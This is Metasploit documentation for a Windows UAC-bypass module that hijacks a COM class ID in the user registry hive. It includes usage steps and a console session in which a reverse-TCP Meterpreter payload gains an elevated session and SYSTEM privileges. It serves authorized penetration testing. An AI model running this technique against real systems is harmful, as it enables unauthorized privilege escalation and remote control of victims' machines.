CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_comhijack.md
Views: 1904

Introduction

This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID that is located in the current user hive. This key contains a reference to a DLL that contains a chosen payload. Multiple COM vectors are defined in this module and one is chosen at random at runtime.

The module modifies the registry in order for this exploit to work. The modification is reverted once the exploitation attempt has finished.

This module requires that the payload architecture matches the target operating system architecture. This is due to the fact that the underlying binaries that are invoked match the system architecture.

If a custom DLL is to be used with EXE::Custom, that DLL must match the system architecture, and should call ExitProcess() after starting the payload in a different process.

Usage

  1. Create a session on the target system under the context of a local administrative user.

  2. Begin interacting with the module: use exploit/windows/local/bypassuac_comhijack.

  3. Set the PAYLOAD and configure it correctly, making sure the architecture is correct.

  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true.

  5. Make sure that the SESSION value is set to the existing session identifier.

  6. Invoke the module: run.

Scenarios

msf exploit(bypassuac_comhijack) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)

msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5A73R51
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_AU
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_comhijack) > options

Module options (exploit/windows/local/bypassuac_comhijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     xxx.xx.255.1     yes       The listen address
   LPORT     8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(bypassuac_comhijack) > run

[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
[+] [2017.08.16-12:58:32] UAC is set to Default
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
[*] [2017.08.16-12:58:33] Executing high integrity process ...
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
[*] [2017.08.16-12:58:38] Cleaining up registry ...
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
msf exploit(bypassuac_comhijack) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  1   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
  2   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)

msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM